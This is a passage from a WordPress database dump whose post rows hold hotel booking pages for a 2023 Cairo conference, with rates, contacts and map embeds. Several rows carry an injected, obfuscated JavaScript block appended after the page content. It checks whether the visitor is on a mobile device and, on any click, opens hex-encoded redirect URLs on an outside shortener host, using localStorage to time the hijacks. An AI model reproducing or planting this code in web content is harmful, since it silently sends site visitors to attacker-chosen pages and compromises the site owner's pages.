g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Grand Nile Tower Hotel','','inherit','closed','closed','','4778-revision-v1','','','2023-06-24 00:50:36','2023-06-24 00:50:36','',4778,'https://gsw2023.com/?p=4780',0,'revision','',0),
(4782,1,'2023-06-24 00:53:57','2023-06-24 00:53:57','<!-- wp:paragraph -->\n<p>For Booking</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>glad to offer $150 Single , $ 165 Double all inclusive of<br>service charge &amp; taxes based on bed &amp; breakfast<br>bases .</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><br><strong>For reservations please send to<br>Haythem.sherif@grandniletower.com</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Best regards,<br>Haythem Sherif<br>Senior Sales Manager<br>haythem.sherif(@grandniletower.com<br>Grand Nile Tower<br>T: 202 23651234 F: 202 23686668 M: 01000066673<br>Corniche El Nil, Garden City, Cairo, Egypt</p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Grand Nile Tower Hotel','','inherit','closed','closed','','4778-revision-v1','','','2023-06-24 00:53:57','2023-06-24 00:53:57','',4778,'https://gsw2023.com/?p=4782',0,'revision','',0),
(4783,1,'2023-06-24 00:54:10','2023-06-24 00:54:10','','Grand Nile Tower Hotel','','inherit','open','closed','','grand-nile-tower-hotel-2','','','2023-06-24 00:54:10','2023-06-24 00:54:10','',2685,'https://gsw2023.com/wp-content/uploads/2023/06/Grand-Nile-Tower-Hotel.jpg',0,'attachment','image/jpeg',0),
(4784,1,'2023-06-24 00:59:30','2023-06-24 00:59:30','<p>[vc_row][vc_column][vc_hoverbox image=\"2683\" primary_title=\"INTERCONTINENTAL CAIRO SEMIRAMIS\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"INTERCONTINENTAL CAIRO SEMIRAMIS\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" hover_btn_align=\"center\" use_custom_fonts_primary_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fgb%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%23scmisc%3Dnav_hoteldetail_ic|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">https://www.ihg.com/intercontinental/hotels</a></span></span></h6>\n</li>\n</ul>\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic</a></span></span></h6>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d6907.530703931726!2d31.232628000000002!3d30.043589!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x0%3A0xaf4aee1a5598653d!2sInterContinental%20Cairo%20Semiramis%2C%20an%20IHG%20Hotel!5e0!3m2!1sen!2seg!4v1674631098317!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h4>Special Rate Booking is Opened Now</h4>\n<h5></h5>\n<h5>Deadline for the Special Rates is August 10, 2023</h5>\n<p>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><a>Other </a><a>Hotel Accommodation</a></h1>\n<p style=\"text-align: center;\"><a> Nearby the Conference Venue</a></p>\n<p>[/vc_column_text][vc_hoverbox image=\"2688\" primary_title=\"Steigenberger Hotel El Tahrir\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Steigenberger Hotel El Tahrir\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" hover_btn_align=\"center\" use_custom_fonts_primary_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.steigenberger.com%2Fen%2Fhotels%2Fall-hotels%2Fegypt%2Fcairo%2Fsteigenberger-el-tahrir-cairo|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fsteigenberger-hotel-el-tahrir%2F\"]</p>\n<ul>\n<li><a href=\"https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo\" target=\"_blank\" rel=\"noopener\">https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.655731227902!2d31.233070315528174!3d30.046733125418612!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c6e7b40217%3A0xa56e70b7cb4fa53d!2sSteigenberger%20Hotel%20El%20Tahrir%20Cairo!5e0!3m2!1sen!2seg!4v1663340357638!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2689\" primary_title=\"Kempinski Nile Hotel Garden City Cairo\" primary_title_font_container=\"color:%230000ed\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Kempinski Nile Hotel Garden City Cairo\" el_width=\"50\" use_custom_fonts_primary_title=\"true\" primary_title_link=\"url:http%3A%2F%2F%3Cli%3E%3Ca%20href%3D%22https%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%22%20target%3D%22_blank%22%20%3Ehttps%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%3C%2Fa%3E%3C%2Fli%3E|title:Hotel%20Accommodation|target:_blank\"]</p>\n<ul>\n<li><a href=\"https://www.kempinski.com/en/cairo/nile-hotel/\" target=\"_blank\" rel=\"noopener\">https://www.kempinski.com/en/cairo/nile-hotel/</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.9374842495713!2d31.228220615528013!3d30.03865132580035!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840cdb8f441cb%3A0x59cf96cf4cfe8978!2sKempinski%20Nile%20Hotel%20Garden%20City%20Cairo!5e0!3m2!1sen!2seg!4v1663341682148!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2690\" primary_title=\"Novotel Cairo El Borg\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Novotel Cairo El Borg\" hover_title_use_theme_fonts=\"yes\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" use_custom_fonts_primary_title=\"true\" use_custom_fonts_hover_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fnovotelborg.com-cairo.com%2F|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fnovotel-cairo-el-borg%2F\"]</p>\n<ul>\n<li><a href=\"https://novotelborg.com-cairo.com/\" target=\"_blank\" rel=\"noopener\">https://novotelborg.com-cairo.com/</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<ul>\n<li>\n<h4>Special Rate Booking is Opened Now</h4>\n<h5>Deadline for the Special Rates is August 15, 2023</h5>\n</li>\n</ul>\n<p>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2690\" primary_title=\"Novotel Cairo El Borg\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Novotel Cairo El Borg\" hover_title_use_theme_fonts=\"yes\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" use_custom_fonts_primary_title=\"true\" use_custom_fonts_hover_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fnovotelborg.com-cairo.com%2F|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fnovotel-cairo-el-borg%2F\"]</p>\n<ul>\n<li><a href=\"https://novotelborg.com-cairo.com/\" target=\"_blank\" rel=\"noopener\">https://novotelborg.com-cairo.com/</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<ul>\n<li>\n<h4>Special Rate Booking is Opened Now</h4>\n<h5>Deadline for the Special Rates is August 15, 2023</h5>\n</li>\n</ul>\n<p>[/vc_hoverbox][vc_hoverbox image=\"4783\" primary_title=\"Grand Nile Tower Hotel\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Novotel Cairo El Borg\" hover_title_use_theme_fonts=\"yes\" hover_background_color=\"blue\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" use_custom_fonts_primary_title=\"true\" use_custom_fonts_hover_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.grandniletower.com%2F|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fgrand-nile-tower-hotel%2F|title:Grand%20Nile%20Tower%20Hotel\"]</p>\n<ul>\n<li>https://www.grandniletower.com/</li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h5></h5>\n<p>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const 